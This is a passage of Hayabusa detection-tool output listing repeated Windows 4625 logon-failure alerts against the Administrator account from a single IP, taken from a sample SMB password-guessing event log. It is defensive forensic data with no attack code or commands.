01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XLVQRnkUd3bfgvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rHjqFQwqpCJFI6qP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L5pEWq2mYsFpFLbb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSFKJXTC2wlyw0gu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vh5igCJpAA5rmqzV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5NzLlJWkfXDcm64c : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9sR1QHgZ4oaa82F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pq1GWcKzSHSP28hk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: agCtM0s62zXPop0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVvglj7RtxrBUeXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMbS0sIpbFDqJvMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldO0cAZ54BRHHDyz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmJH2QWFPiYarKh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5fCiyHtI0OTo8pBO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3vkVuU43tsYHUSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3w21sFOu2u7FTDZM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bk7eaqQNK1CEgqoj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rv5joLgkm3QUYPyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4l15usDM7jggwEyw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9QpOvgDmiOgzQqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dqyr8tb9TrO1aJNe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hI1bzjixP8eOdDbw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMTAp20wXS3d1OCk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrQGfxInmlgPqGtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcsMMQbsnUdyLJWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oRYZqBBsq9GyApI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0TAhib6p8fY5iOgI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FerGHj9abOe6ehZn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kN4B4KLpXbyKZzGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HJtoyRfP38T3KToO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkI5hLApUWhGnKIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZCPSO4JLjMur2Eow : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHmrv2xFuq7TyIQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8SqYq3msNfFh24lg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YE0a2Bypzc1MMdGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ojgIg88VK6hB72PI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehLrf2GoAhY3Rf7Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ccfgpjwpis15B4gY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vysSf3DsOxQf5fVd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEp88cEeiNw4IQsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5PXDJPzw0gPdlCiH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mwoe9IgWx2UZ7Iuu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3eW0nFDUwKFzoQIw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q0i0p5QxJ4ykYYJt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VsxqWAnd6j2CdyB3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5qdy80mtFWl199k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ce0d84uBK4t2sqR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4dZYZEW1VijjwHN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmqGJWbeap5dv0gC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaNUqChgVSbDkFQu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B4PDZ55it0V4QGnM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQxXVB8Aj5gaw2f2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzDeZtgSJoH74GYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iNAFsZraFvw67WWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aVdnbyzWqk58rOW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjUH2PopXCrrPzqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ylmV2z3WjTWsTpyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qBKZTYRTKuEAgS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JvekO4A5f6QK2ynZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDUqydSeA1guOjIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o71TltsJDyOIuLQb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXT3MSCes42dVCNn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FGXiWeT8Evr6G70M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V2RarzrnGgcLaseH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3k7dXu9o1vMkhby : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EDBt76dmYnPstFWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4yjzMC7cw0fe7gjS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eQOWCM7KP68DZTX9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kn9WWWqCIwfrPbie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQcamLSzsXOjP6FL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6R6ZMRoYkAPB35Bq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubqnZm0jmHNFCHrM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ORQ8vL1oo6CkJXK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rDPl1SSddrWEs979 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrK7fENAr1lxFr9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 